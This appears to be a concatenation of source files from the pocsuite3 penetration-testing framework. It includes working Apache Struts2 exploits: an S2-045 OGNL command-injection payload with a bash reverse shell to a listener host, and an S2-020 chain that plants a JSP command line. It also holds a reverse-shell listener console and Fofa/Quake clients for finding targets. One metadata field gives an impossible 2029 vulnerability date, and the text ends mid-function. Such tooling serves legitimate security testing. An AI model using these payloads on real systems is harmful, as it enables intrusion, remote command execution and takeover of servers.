                    resp = requests.get(vuln_url, allow_redirects=False, timeout=5)
                if resp and resp.status_code in (200, 302) and "echo" not in resp.text and (
                        flag in resp.text or flag in resp.headers.get("location", "")):
                    if mode == 'verify':
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = vuln_url
                    else:
                        result['AttackInfo'] = {}
                        result['AttackInfo']['URL'] = vuln_url
                        result['AttackInfo']['Command'] = command
                        result['AttackInfo']['CommandRet'] = (resp.headers.get("location", "") + resp.text).replace(
                            "\x00", "").encode()
                    break
            except Exception as e:
                logger.error(e)
        return result

    def _verify(self):
        result = {}
        try:
            result = self.expolit(mode='verify')
        except Exception as e:
            logger.exception(e)
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        result = {}

        try:
            result = self.expolit(mode='attack')
        except Exception as e:
            logger.exception(e)
        return self.parse_output(result)

    def _shell(self):
        result = {}

        try:
            result = self.expolit(mode='shell')
        except Exception as e:
            logger.error(e)
        return self.parse_output(result)


register_poc(DemoPOC)



import random
import string
from collections import OrderedDict

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, get_listener_ip, get_listener_port
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-045']
    name = 'Apache Struts2 s2-045'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-045:影响版本Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('ls', description="可执行的shell命令")
        return o

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        flagname = random_str(5, string.ascii_lowercase)
        randint = random.randint(300, 900)
        calc_result = randint * randint
        headers = {
            # "Content-Type": exec_payload.replace("CMD", "echo 111")
            "Content-Type": "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('" + flagname + "'," + str(
                randint) + "*" + str(randint) + ")}.multipart/form-data"
        }
        req = requests.post(self.url, "", headers=headers)
        headers = req.headers
        issuc = False
        for key, value in headers.items():
            if key == flagname or value == str(calc_result):
                issuc = True
                break

        if issuc:
            result["VerifyInfo"] = {
                "URL": self.url,
                "Headers": repr(headers)
            }
            return result
        return False

    def _attack(self):
        result = {}
        p = self._check()
        if p:
            payloadPrefix = "hah-multipart/form-data %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"

            payloadSuffix = "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            cmd = self.get_option("command")
            payload = payloadPrefix + cmd + payloadSuffix
            headers = {
                "Content-Type": payload,
                "Connection": "close"
            }
            req = requests.get(self.url, headers=headers)
            html = ''
            if req.status_code == 200 and req.text:
                html = req.text
            result["VerifyInfo"] = {
                "VerifyInfo": {
                    "info": html
                }
            }
        return self.parse_output(result)

    def _shell(self):
        # get_listener_ip(), get_listener_port()
        # shell_command = "sh -i >& /dev/tcp/{}/{} 0>&1".format(get_listener_ip(), get_listener_port())
        # b64raw = base64.b64encode(shell_command.encode()).decode()
        # fullcmd = "bash -c {echo," + b64raw + "}|{base64,-d}|{bash,-i}"
        fullcmd = f"bash -c \"bash -i >& /dev/tcp/{get_listener_ip()}/{get_listener_port()} 0>&1\""

        self.set_option("command", fullcmd)
        try:
            self._attack()
        except:
            pass

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from collections import OrderedDict
from dataclasses import dataclass, field
import time
from typing import Union, List, Optional

from requests_toolbelt.utils import dump

from pocsuite3.lib.core.data import AttribDict
from pocsuite3.lib.core.log import LOGGER as logger
from pocsuite3.lib.request import requests
from pocsuite3.lib.yaml.nuclei.model import CaseInsensitiveEnum
from pocsuite3.lib.yaml.nuclei.operators import (Extractor, ExtractorType,
                                                 Matcher, MatcherType,
                                                 extract_dsl, extract_json,
                                                 extract_kval, extract_regex,
                                                 extract_xpath, match_binary,
                                                 match_dsl, match_regex,
                                                 match_size, match_status_code,
                                                 match_words, match_xpath)
from pocsuite3.lib.yaml.nuclei.protocols.common.generators import AttackType, payload_generator
from pocsuite3.lib.yaml.nuclei.protocols.common.interactsh import InteractshClient
from pocsuite3.lib.yaml.nuclei.protocols.common.replacer import (
    UnresolvedVariableException, UNRESOLVED_VARIABLE, marker_replace, Marker)


class HTTPMethod(CaseInsensitiveEnum):
    HTTPGet = "GET"
    HTTPHead = "HEAD"
    HTTPPost = "POST"
    HTTPPut = "PUT"
    HTTPDelete = "DELETE"
    HTTPConnect = "CONNECT"
    HTTPOptions = "OPTIONS"
    HTTPTrace = "TRACE"
    HTTPPatch = "PATCH"
    HTTPPurge = "PURGE"
    HTTPDebug = "DEBUG"


@dataclass
class HttpRequest:
    """HttpRequest contains a http request to be made from a template
    """

    # Operators for the current request go here.
    matchers: List[Matcher] = field(default_factory=list)
    extractors: List[Extractor] = field(default_factory=list)
    matchers_condition: str = 'or'

    # Path contains the path/s for the HTTP requests. It supports variables as placeholders.
    path: List[str] = field(default_factory=list)

    # Raw contains HTTP Requests in Raw format.
    raw: List[str] = field(default_factory=list)

    # ID is the optional id of the request
    id: str = ''

    name: str = ''
    # Attack is the type of payload combinations to perform.
    attack: AttackType = AttackType.BatteringRamAttack

    # Method is the HTTP Request Method.
    method: Optional[HTTPMethod] = HTTPMethod.HTTPGet

    # Body is an optional parameter which contains HTTP Request body.
    body: str = ''

    # Payloads contains any payloads for the current request.
    payloads: dict = field(default_factory=dict)

    # Headers contains HTTP Headers to send with the request.
    headers: dict = field(default_factory=dict)

    # RaceCount is the number of times to send a request in Race Condition Attack.
    race_count: int = 0

    # MaxRedirects is the maximum number of redirects that should be followed.
    max_redirects: int = 0

    # PipelineConcurrentConnections is number of connections to create during pipelining.
    pipeline_concurrent_connections: int = 0

    # PipelineRequestsPerConnection is number of requests to send per connection when pipelining.
    pipeline_requests_per_connection: int = 0

    # Threads specifies number of threads to use sending requests. This enables Connection Pooling.
    threads: int = 0

    # MaxSize is the maximum size of http response body to read in bytes.
    max_size: int = 0

    cookie_reuse: bool = False

    read_all: bool = False
    redirects: bool = False
    host_redirects: bool = False
    pipeline: bool = False
    unsafe: bool = False
    race: bool = False

    # Request condition allows checking for condition between multiple requests for writing complex checks and
    # exploits involving multiple HTTP request to complete the exploit chain.
    req_condition: bool = False

    stop_at_first_match: bool = True
    skip_variables_check: bool = False
    iterate_all: bool = False
    digest_username: str = ''
    digest_password: str = ''


def http_response_to_dsl_map(resp: requests.Response):
    """Converts an HTTP response to a map for use in DSL matching
    """
    data = AttribDict()
    if not isinstance(resp, requests.Response):
        return data

    for k, v in resp.cookies.items():
        data[k.lower()] = v
    for k, v in resp.headers.items():
        data[k.lower().replace('-', '_')] = v

    req_headers_raw = '\n'.join(f'{k}: {v}' for k, v in resp.request.headers.items())
    req_body = resp.request.body
    if not req_body:
        req_body = b''
    if not isinstance(req_body, bytes):
        req_body = req_body.encode()
    resp_headers_raw = '\n'.join(f'{k}: {v}' for k, v in resp.headers.items())
    resp_body = resp.content

    data['request'] = req_headers_raw.encode() + b'\n\n' + req_body
    data['response'] = resp_headers_raw.encode() + b'\n\n' + resp_body
    data['status_code'] = resp.status_code
    data['body'] = resp_body
    data['all_headers'] = resp_headers_raw
    data['header'] = resp_headers_raw
    data['kval_extractor_dict'] = {}
    data['kval_extractor_dict'].update(resp.cookies)
    data['kval_extractor_dict'].update(resp.headers)

    return data


def http_get_match_part(part: str, resp_data: dict, return_bytes: bool = False) -> str:
    result = ''
    if part == '':
        part = 'body'

    if part in resp_data:
        result = resp_data[part]

    if return_bytes and not isinstance(result, bytes):
        result = str(result).encode()
    elif not return_bytes and isinstance(result, bytes):
        try:
            result = result.decode()
        except UnicodeDecodeError:
            result = str(result)
    return result


def http_match(request: HttpRequest, resp_data: dict, interactsh=None):
    matchers = request.matchers
    matchers_result = []

    if 'interactsh_' in str(matchers) and isinstance(interactsh, InteractshClient):
        interactsh.poll()
        resp_data['interactsh_protocol'] = '\n'.join(interactsh.interactsh_protocol)
        resp_data['interactsh_request'] = '\n'.join(interactsh.interactsh_request)
        resp_data['interactsh_response'] = '\n'.join(interactsh.interactsh_response)
    else:
        resp_data['interactsh_protocol'] = ''
        resp_data['interactsh_request'] = ''
        resp_data['interactsh_response'] = ''

    for i, matcher in enumerate(matchers):
        matcher_res = False
        item = http_get_match_part(matcher.part, resp_data, matcher.type == MatcherType.BinaryMatcher)

        if matcher.type == MatcherType.StatusMatcher:
            matcher_res = match_status_code(matcher, resp_data.get('status_code', 0))

        elif matcher.type == MatcherType.SizeMatcher:
            matcher_res = match_size(matcher, len(item))

        elif matcher.type == MatcherType.WordsMatcher:
            matcher_res, _ = match_words(matcher, item, resp_data)

        elif matcher.type == MatcherType.RegexMatcher:
            matcher_res, _ = match_regex(matcher, item)

        elif matcher.type == MatcherType.BinaryMatcher:
            matcher_res, _ = match_binary(matcher, item)

        elif matcher.type == MatcherType.DSLMatcher:
            matcher_res = match_dsl(matcher, resp_data)

        elif matcher.type == MatcherType.XpathMatcher:
            matcher_res, _ = match_xpath(matcher, item)

        if matcher.negative:
            matcher_res = not matcher_res

        logger.debug(f'[+] {matcher} -> {matcher_res}')

        if not matcher_res:
            if request.matchers_condition == 'and':
                return False
            elif request.matchers_condition == 'or':
                continue

        if request.matchers_condition == 'or':
            return True

        matchers_result.append(matcher_res)

        if len(matchers) - 1 == i:
            return True

    return False


def http_extract(request: HttpRequest, resp_data: dict):
    extractors = request.extractors
    extractors_result = {'internal': {}, 'external': {}, 'extra_info': []}

    for extractor in extractors:
        item = http_get_match_part(extractor.part, resp_data)

        res = None
        if extractor.type == ExtractorType.RegexExtractor:
            res = extract_regex(extractor, item)
        elif extractor.type == ExtractorType.KValExtractor:
            res = extract_kval(extractor, resp_data.get('kval_extractor_dict', {}))
        elif extractor.type == ExtractorType.XPathExtractor:
            res = extract_xpath(extractor, item)
        elif extractor.type == ExtractorType.JSONExtractor:
            res = extract_json(extractor, item)
        elif extractor.type == ExtractorType.DSLExtractor:
            res = extract_dsl(extractor, resp_data)

        logger.debug(f'[+] {extractor} -> {res}')
        extractors_result['internal'].update(res['internal'])
        extractors_result['external'].update(res['external'])
        extractors_result['extra_info'] += res['extra_info']
    return extractors_result


def extract_dict(text, line_sep='\n', kv_sep='='):
    """Split the string into a dictionary according to the split method
    """
    _dict = OrderedDict([i.split(kv_sep, 1) for i in text.split(line_sep)])
    return _dict


def http_request_generator(request: HttpRequest, dynamic_values: OrderedDict):
    request_count = len(request.path + request.raw)
    # Determine the number of requests and modify the req_condition attribute of the HttpRequest object
    if request_count > 1:
        request.req_condition = True

    for payload_instance in payload_generator(request.payloads, request.attack):
        current_index = 0
        dynamic_values.update(payload_instance)
        for path in request.path + request.raw:
            current_index += 1
            method, url, headers, data, kwargs = '', '', '', '', OrderedDict()
            # base request
            username, password = request.digest_username, request.digest_password
            if path.startswith(Marker.ParenthesisOpen):
                method = request.method.value
                headers = request.headers
                data = request.body
                url = path

            # raw
            else:
                raw = path.strip()
                raws = list(map(lambda x: x.strip(), raw.splitlines()))
                # Extract timeout value
                if raws[0].startswith('@timeout'):
                    timeout = Marker.extract_timeout_value(raws[0])
                    del raws[0]
                    method, path, _ = raws[0].split(' ')
                    kwargs.setdefault('timeout', timeout)
                else:
                    method, path, _ = raws[0].split(' ')
                if method == "POST":
                    index = 0
                    for i in raws:
                        index += 1
                        if i.strip() == "":
                            break
                    if len(raws) == index:
                        raise Exception

                    headers = raws[1:index - 1]
                    headers = extract_dict('\n'.join(headers), '\n', ": ")
                    data = '\n'.join(raws[index:])
                else:
                    headers = extract_dict('\n'.join(raws[1:]), '\n', ": ")

                url = f'{Marker.ParenthesisOpen}BaseURL{Marker.ParenthesisClose}{path}'

            kwargs.setdefault('allow_redirects', request.redirects)
            kwargs.setdefault('data', data)
            kwargs.setdefault('headers', headers)
            if username or password:
                kwargs.setdefault('auth', (username, password))
            try:
                url = marker_replace(url, dynamic_values)
                kwargs = marker_replace(kwargs, dynamic_values)
            except UnresolvedVariableException:
                continue

            if 'auth' in kwargs:
                kwargs['auth'] = tuple(kwargs['auth'])
            yield method, url, kwargs, payload_instance, request_count, current_index


def execute_http_request(request: HttpRequest, dynamic_values, interactsh) -> Union[bool, list]:
    results = []
    resp_data_all = {}
    with requests.Session() as session:
        try:
            for (method, url, kwargs, payload, request_count, current_index) in http_request_generator(
                    request, dynamic_values):
                try:
                    # Redirection conditions can be specified per each template. By default, redirects are not
                    # followed. However, if desired, they can be enabled with redirects: true in request details. 10
                    # redirects are followed at maximum by default which should be good enough for most use cases.
                    # More fine grained control can be exercised over number of redirects followed by using
                    # max-redirects field.

                    if request.max_redirects:
                        session.max_redirects = request.max_redirects
                    else:
                        session.max_redirects = 10

                    # Calculate response time
                    start_time = time.time()
                    response = session.request(method=method, url=url, **kwargs)
                    end_time = time.time()
                    resp_time = end_time - start_time

                    # for debug purpose
                    try:
                        logger.debug(dump.dump_all(response).decode('utf-8'))
                    except UnicodeDecodeError:
                        logger.debug(dump.dump_all(response))

                except Exception:
                    import traceback
                    traceback.print_exc()
                    response = None

                resp_data = http_response_to_dsl_map(response)
                if response is not None:
                    resp_data['duration'] = resp_time

                if response:
                    response.close()

                extractor_res = http_extract(request, resp_data)
                for k, v in extractor_res['internal'].items():
                    if v == UNRESOLVED_VARIABLE and k in dynamic_values:
                        continue
                    else:
                        dynamic_values[k] = v

                if request.req_condition:
                    resp_data_all.update(resp_data)
                    for k, v in resp_data.items():
                        resp_data_all[f'{k}_{current_index}'] = v
                    if current_index == request_count:
                        resp_data_all.update(dynamic_values)
                        match_res = http_match(request, resp_data_all, interactsh)
                        resp_data_all = {}
                        if match_res:
                            output = {}
                            output.update(extractor_res['external'])
                            output.update(payload)
                            output['extra_info'] = extractor_res['extra_info']
                            results.append(output)
                            if request.stop_at_first_match:
                                return results
                else:
                    resp_data.update(dynamic_values)
                    match_res = http_match(request, resp_data, interactsh)
                    if match_res:
                        output = {}
                        output.update(extractor_res['external'])
                        output.update(payload)
                        output['extra_info'] = extractor_res['extra_info']
                        results.append(output)
                        if request.stop_at_first_match:
                            return results
        except Exception:
            import traceback
            traceback.print_exc()
        if results and any(results):
            return results
        else:
            return False



import getpass
import time
from base64 import b64encode
from configparser import ConfigParser
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.core.common import is_ipv6_address_format
from pocsuite3.lib.request import requests


class Fofa():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, user=None, token=None):
        self.headers = {'User-Agent': 'curl/7.80.0'}
        self.credits = 0
        self.conf_path = conf_path
        self.user = user
        self.token = token
        self.api_url = 'https://fofa.info/api/v1'

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.user = self.user or self.parser.get("Fofa", 'user')
                self.token = self.token or self.parser.get("Fofa", 'token')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token and self.user:
            try:
                resp = requests.get(
                    f'{self.api_url}/info/my?email={self.user}&key={self.token}',
                    headers=self.headers)
                logger.info(resp.text)
                if resp and resp.status_code == 200 and "username" in resp.json():
                    return True
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_token(self):
        if self.token_is_available():
            return True

        while True:
            user = input("Fofa user email: ")
            new_token = getpass.getpass("Fofa api key: (input will hidden) ")
            self.token = new_token
            self.user = user
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The Fofa user email or api key are incorrect, Please enter the correct one.")

    def write_conf(self):
        if not self.parser.has_section("Fofa"):
            self.parser.add_section("Fofa")
        try:
            self.parser.set("Fofa", "Token", self.token)
            self.parser.set("Fofa", "User", self.user)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def search(self, dork, pages=1, resource='host'):
        if resource == 'host':
            resource = 'protocol,ip,port'
        else:
            resource = 'protocol,host'

        dork = b64encode(dork.encode()).decode()
        search_result = set()

        try:
            for page in range(1, pages + 1):
                time.sleep(1)
                url = (
                    f"{self.api_url}/search/all?email={self.user}&key={self.token}&qbase64={dork}&"
                    f"fields={resource}&page={page}"
                )
                resp = requests.get(url, headers=self.headers, timeout=60)
                if resp and resp.status_code == 200 and "results" in resp.json():
                    content = resp.json()
                    for match in content['results']:
                        if resource == "protocol,ip,port":
                            ip = match[1]
                            if is_ipv6_address_format(ip):
                                ip = f'[{ip}]'
                            search_result.add("%s://%s:%s" % (match[0], ip, match[2]))
                        else:
                            if '://' not in match[1]:
                                search_result.add("%s://%s" % (match[0], match[1]))
                            else:
                                search_result.add(match[1])
                else:
                    logger.error("[PLUGIN] Fofa:{}".format(resp.text))
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == "__main__":
    fa = Fofa()
    z = fa.search('body="thinkphp"', pages=2)
    print(z)
    z = fa.search('body="thinkphp"', resource='web')
    print(z)



import time
import getpass
from configparser import ConfigParser
from pocsuite3.lib.core.data import logger, paths
from pocsuite3.lib.core.common import is_ipv6_address_format
from pocsuite3.lib.request import requests


class Quake():
    def __init__(self, conf_path=paths.POCSUITE_RC_PATH, token=None):
        self.headers = {'User-Agent': 'curl/7.80.0', 'Content-Type': 'application/json'}
        self.credits = 0
        self.conf_path = conf_path
        self.token = token

        if self.conf_path:
            self.parser = ConfigParser()
            self.parser.read(self.conf_path)
            try:
                self.token = self.token or self.parser.get("Quake", 'token')
            except Exception:
                pass

        self.check_token()

    def token_is_available(self):
        if self.token:
            try:
                self.headers['X-QuakeToken'] = self.token
                resp = requests.get(
                    'https://quake.360.cn/api/v3/user/info', headers=self.headers)

                if 'month_remaining_credit' not in resp.text:
                    logger.info(resp.text)

                if resp and resp.status_code == 200 and resp.json()['code'] == 0:
                    return True
            except Exception as ex:
                logger.error(str(ex))
        return False

    def check_token(self):
        if self.token_is_available():
            return True
        while True:
            new_token = getpass.getpass("Quake API token: (input will hidden)")
            self.token = new_token
            if self.token_is_available():
                self.write_conf()
                return True
            else:
                logger.error("The Quake api token is incorrect, Please enter the correct api token.")

    def write_conf(self):
        if not self.parser.has_section("Quake"):
            self.parser.add_section("Quake")
        try:
            self.parser.set("Quake", "Token", self.token)
            self.parser.write(open(self.conf_path, "w"))
        except Exception as ex:
            logger.error(str(ex))

    def search(self, dork, pages=2):
        search_result = set()
        data = {"query": dork, "size": 10,
                "ignore_cache": "false", "start": 1}
        try:
            for page in range(1, pages + 1):
                time.sleep(1)
                data['start'] = page
                url = "https://quake.360.cn/api/v3/search/quake_service"
                resp = requests.post(url, json=data, headers=self.headers, timeout=60)
                if resp and resp.status_code == 200 and resp.json()['code'] == 0:
                    content = resp.json()
                    for match in content['data']:
                        ip = match['ip']
                        if is_ipv6_address_format(ip):
                            ip = f'[{ip}]'
                        search_result.add("%s:%s" % (ip, match['port']))
                else:
                    logger.error("[PLUGIN] Quake:{}".format(resp.text))
        except Exception as ex:
            logger.error(str(ex))
        return search_result


if __name__ == "__main__":
    qk = Quake(token="")
    z = qk.search('app:"F5_BIG-IP"')
    print(z)



"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
import re
import time
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.lib.core.enums import VUL_TYPE


class DemoPOC(POCBase):
    vulID = '1228'  # ssvid
    version = '1'
    author = ['']
    vulDate = '2014-04-23'
    createDate = '2014-04-23'
    updateDate = '2023-12-21'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-020']
    name = 'Apache Struts2 s2-020'
    appPowerLink = 'http://struts.apache.org/'
    appName = 'Apache Struts2'
    appVersion = 'Struts 2.0.0 - Struts 2.3.16.1'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''
    '''
    samples = []
    install_requires = ['']
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def getLink(self, url):
        '''使用正则得到页面中.action和.do链接'''
        rnt = []
        page_content = requests.get(url).text
        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:action|do))''', page_content)
        for item_url in match:
            if 'http' not in item_url:
                item_url = urljoin(url, item_url)
            rnt.append(item_url)

        return rnt

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _check(self):
        result = {}
        url = self.url
        if url.endswith('.do') or url.endswith('.action'):
            url_actions = [url]
        else:
            url = url.strip('/') + '/'
            url_actions = self.getLink(url)
            if not url_actions:
                url_actions = [url]

        for url_action in url_actions:
            directory_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.directory=webapps/manager"
            prefix_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.prefix=S2_020"
            suffix_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.suffix=.txt"
            filedataformat_url = url_action + "?class[%27classLoader%27][%27resources%27].context.parent.pipeline.first.fileDateFormat=1"
            cmd = url_action + 'aaaa.jsp?a=<%Runtime.getRuntime().exec("ifconfig");%>'
            shelljsp_url = urljoin(url_action, '/../../manager/') + 'S2_0201.txt'

            try:
                directory_request = requests.get(directory_url)
                time.sleep(1)
                prefix_request = requests.get(prefix_url)
                time.sleep(1)
                suffix_request = requests.get(suffix_url)
                time.sleep(1)
                filedataformat_request = requests.get(filedataformat_url)
                time.sleep(1)
                cmd_request = requests.get(cmd)
                time.sleep(10)
                shell_request = requests.get(shelljsp_url)

                shell_content = shell_request.text
                match = re.search('context.parent.pipeline.first.fileDateFormat=1', shell_content)
                if match:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['status'] = "Upload Success!"
                    result['VerifyInfo']['shell_url'] = shelljsp_url
                    return result

            except Exception as e:
                logger.debug(str(e))

        return False

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        return self._verify()


register_poc(DemoPOC)



import base64
import pickle
import zlib
import select
import socket
import threading
import time
import os
from pocsuite3.lib.utils import gen_cert
from pocsuite3.lib.core.common import data_to_stdout, has_poll, get_unicode, mosaic
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import AUTOCOMPLETE_TYPE, OS, CUSTOM_LOGGING
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.core.shell import auto_completion, clear_history, save_history, load_history
from pocsuite3.lib.core.threads import exception_handled_function


def get_sock_listener(listen_port, listen_host="0.0.0.0", ipv6=False, protocol=None):
    if protocol in [None, "TCP"]:
        protocol = socket.SOCK_STREAM
    elif protocol in ["UDP"]:
        protocol = socket.SOCK_DGRAM

    if ipv6:
        s = socket.socket(socket.AF_INET6, protocol)
        if listen_host == "0.0.0.0":
            listen_host = "::"
    else:
        s = socket.socket(socket.AF_INET, protocol)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    msg = ''
    if conf.enable_tls_listener and protocol == socket.SOCK_STREAM:
        import ssl
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        cert_path = os.path.join(paths.POCSUITE_TMP_PATH, 'cacert.pem')
        gen_cert(filepath=cert_path)
        context.load_cert_chain(cert_path)
        s = context.wrap_socket(s, server_side=True)
        msg = 'TLS '
    try:
        s.bind((listen_host, listen_port))
    except socket.error:
        s.close()
        if conf.connect_back_host in kb.data.local_ips:
            logger.warn(f'unable to listen on {listen_host}:{listen_port}, check if the port is occupied.')
        return None

    if protocol == socket.SOCK_STREAM:
        msg += "listening on {0}:{1}".format(listen_host, listen_port)
        logger.log(CUSTOM_LOGGING.SYSINFO, msg)
        s.listen(5)
    return s


def get_udp_listener(listen_port=DEFAULT_LISTENER_PORT, listen_host="0.0.0.0", ipv6=False):
    return get_sock_listener(listen_port, listen_host, ipv6, "UDP")


def get_tcp_listener(listen_port=DEFAULT_LISTENER_PORT, listen_host="0.0.0.0", ipv6=False):
    return get_sock_listener(listen_port, listen_host, ipv6, "TCP")


def start_listener():
    t = threading.Thread(target=exception_handled_function, name="listener-thread", args=[listener_worker])
    t.setDaemon(True)
    t.start()


def listener_worker():
    s = get_tcp_listener(ipv6=conf.ipv6, listen_port=int(conf.connect_back_port))
    while True:
        try:
            conn, address = s.accept()
            conn.setblocking(1)
            client = AttribDict()
            client.conn = conn
            client.address = address
            kb.data.clients.append(client)
            info_msg = "new connection established from {0}".format(mosaic(address[0]))
            logger.log(CUSTOM_LOGGING.SUCCESS, info_msg)
        except Exception:
            pass


def list_clients():
    results = ''
    # https://en.wikipedia.org/wiki/Uname
    # https://en.wikipedia.org/wiki/Ver_(command)
    os_fingerprint = {
        'Linux': ['Linux', 'GNU'],
        'macOS': ['Darwin'],
        'Windows': ['Windows', 'PS ', 'C:\\', 'CYGWIN', 'MS-DOS', 'MSYS_NT', 'cmdlet'],
        'BSD': ['FreeBSD', 'OpenBSD', 'NetBSD', 'MidnightBSD'],
        'Solaris': ['SunOS']
    }
    for i, client in enumerate(kb.data.clients):
        try:
            client.conn.send(b'uname\nver\n')
            ret = poll_cmd_execute(client).lower()
            system, found = 'unknown', False
            for o, ks in os_fingerprint.items():
                if found:
                    break
                for k in ks:
                    if k.lower() in ret.lower():
                        system = o
                        found = True
                        break
        except Exception:  # If a connection fails, remove it
            del kb.data.clients[i]
            continue

        results += (f'{i}   ' + mosaic(client.address[0]) + f'     ({system})\n')
    data_to_stdout("----- Remote Clients -----" + "\n" + results)


def get_client(cmd):
    try:
        target = cmd.split(" ")[1]
        target = int(target)
        client = kb.data.clients[target]  # Connect to the selected clients
        data_to_stdout("Now Connected: {0}\n".format(mosaic(client.address[0])))
        return client
    except Exception:
        data_to_stdout("Invalid Client\n")
        return None


def send_shell_commands_for_console(client):
    module_prompt_default_template = "\033[4mSHELL\033[0m (\033[91m{hostname}\033[0m) > "
    while True:
        cmd = None
        try:
            address = client.address[0]
            cmd = input(module_prompt_default_template.format(hostname=address))
            if not cmd:
                continue

            elif cmd.lower() == "clear":
                clear_history()
                data_to_stdout("[i] history cleared\n")

            elif cmd.lower() in ("x", "q", "exit", "quit", "bye"):
                break

            client.conn.send(str.encode(cmd + '\n'))

            resp = poll_cmd_execute(client)

            data_to_stdout(resp)

        except KeyboardInterrupt:
            logger.warn('Interrupt: use the \'quit\' command to quit')
            continue

        except Exception as ex:
            logger.error(str(ex))
            data_to_stdout("Connection Lost\n")
            break
    return True


def send_shell_commands(client):
    auto_completion(AUTOCOMPLETE_TYPE.OS, OS.LINUX)
    while True:
        cmd = None
        try:
            address = client.address[0]
            cmd = input("{0}>: ".format(mosaic(address)))
            if not cmd:
                continue

            elif cmd.lower() == "clear":
                clear_history()
                data_to_stdout("[i] history cleared\n")
                save_history(AUTOCOMPLETE_TYPE.POCSUITE)

            elif cmd.lower() in ("x", "q", "exit", "quit", "bye"):
                break

            client.conn.send(str.encode(cmd + '\n'))

            resp = poll_cmd_execute(client)

            data_to_stdout(resp)

        except KeyboardInterrupt:
            logger.warn('Interrupt: use the \'quit\' command to quit')
            continue

        except Exception as ex:
            logger.error(str(ex))
            data_to_stdout("Connection Lost\n")
            break


def poll_cmd_execute(client, timeout=3):
    if has_poll():
        p = select.poll()
        event_in_mask = select.POLLIN | select.POLLPRI
        event_err_mask = select.POLLERR
        event_closed_mask = select.POLLHUP | select.POLLNVAL
        event_mask = event_in_mask | event_err_mask | event_closed_mask
        p.register(client.conn, event_mask)
        count = 0
        ret = ''
        read_again = True
        while True:
            events = p.poll(100)
            if events:
                event = events[0][1]
                if event & select.POLLERR:
                    ret = "Client Hung up\n"
                    break

                ready = event & select.POLLPRI or event & select.POLLIN
                if not ready:
                    ret = "Command has no result or filtered by firewall\n"
                    break
                else:
                    time.sleep(0.05)
                    ret += get_unicode(client.conn.recv(65536))
            else:
                if ret:
                    if read_again:
                        read_again = False
                        continue
                    break
                elif count > timeout:
                    ret = "Command has no result or filtered by firewall\n"
                    break
                else:
                    data_to_stdout(".")
                    read_again = False
                    time.sleep(1)
                    count += 1

        p.unregister(client.conn)
    else:
        count = 0
        ret = ''
        read_again = True
        while True:
            ready = select.select([client.conn], [], [], 0.1)
            if ready[0]:
